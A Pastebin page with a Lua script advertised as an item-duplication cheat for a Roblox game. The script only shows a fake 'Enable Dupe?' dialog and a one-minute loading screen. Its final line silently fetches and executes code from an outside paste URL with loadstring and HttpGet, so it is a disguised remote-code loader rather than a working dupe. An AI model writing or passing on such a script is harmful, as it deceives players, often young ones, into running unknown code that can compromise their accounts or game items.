Advertisement
beehivepeople1

Bubble gum simulator infinity dupe script

Apr 27th, 2025
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.04 KB | Gaming | 0 0
  1. -- Create the ScreenGui
  2. local screenGui = Instance.new("ScreenGui")
  3. screenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  4.  
  5. -- Create the black box frame
  6. local frame = Instance.new("Frame")
  7. frame.Size = UDim2.new(0, 300, 0, 200)
  8. frame.Position = UDim2.new(0.5, -150, 0.5, -100)
  9. frame.BackgroundColor3 = Color3.new(0, 0, 0)
  10. frame.Parent = screenGui
  11.  
  12. -- Create the title label
  13. local label = Instance.new("TextLabel")
  14. label.Size = UDim2.new(1, 0, 0.4, 0)
  15. label.Position = UDim2.new(0, 0, 0, 0)
  16. label.BackgroundTransparency = 1
  17. label.Text = "Enable Dupe?"
  18. label.TextColor3 = Color3.new(1, 1, 1)
  19. label.TextScaled = true
  20. label.Parent = frame
  21.  
  22. -- Create the confirm button
  23. local button = Instance.new("TextButton")
  24. button.Size = UDim2.new(0.6, 0, 0.25, 0)
  25. button.Position = UDim2.new(0.2, 0, 0.6, 0)
  26. button.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  27. button.Text = "Confirm"
  28. button.TextColor3 = Color3.new(0, 0, 0)
  29. button.TextScaled = true
  30. button.Parent = frame
  31.  
  32. -- Function when button is clicked
  33. button.MouseButton1Click:Connect(function()
  34.     -- Hide the original frame
  35.     frame.Visible = false
  36.  
  37.     -- Create a loading screen
  38.     local loadingFrame = Instance.new("Frame")
  39.     loadingFrame.Size = UDim2.new(1, 0, 1, 0)
  40.     loadingFrame.Position = UDim2.new(0, 0, 0, 0)
  41.     loadingFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  42.     loadingFrame.Parent = screenGui
  43.  
  44.     -- Loading text
  45.     local loadingLabel = Instance.new("TextLabel")
  46.     loadingLabel.Size = UDim2.new(1, 0, 1, 0)
  47.     loadingLabel.Position = UDim2.new(0, 0, 0, 0)
  48.     loadingLabel.BackgroundTransparency = 1
  49.     loadingLabel.Text = "Loading..."
  50.     loadingLabel.TextColor3 = Color3.new(1, 1, 1)
  51.     loadingLabel.TextScaled = true
  52.     loadingLabel.Parent = loadingFrame
  53.  
  54.     -- Wait for 1 minute (60 seconds)
  55.     wait(60)
  56.  
  57.     -- After 1 minute, remove the loading screen
  58.     loadingFrame:Destroy()
  59.  
  60.     -- (Optional) Do something after loading is done
  61.     -- Example: print("Loading Complete!")
  62. end)
  63. loadstring(game:HttpGet("http://vpaste.net/8FCp0"))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement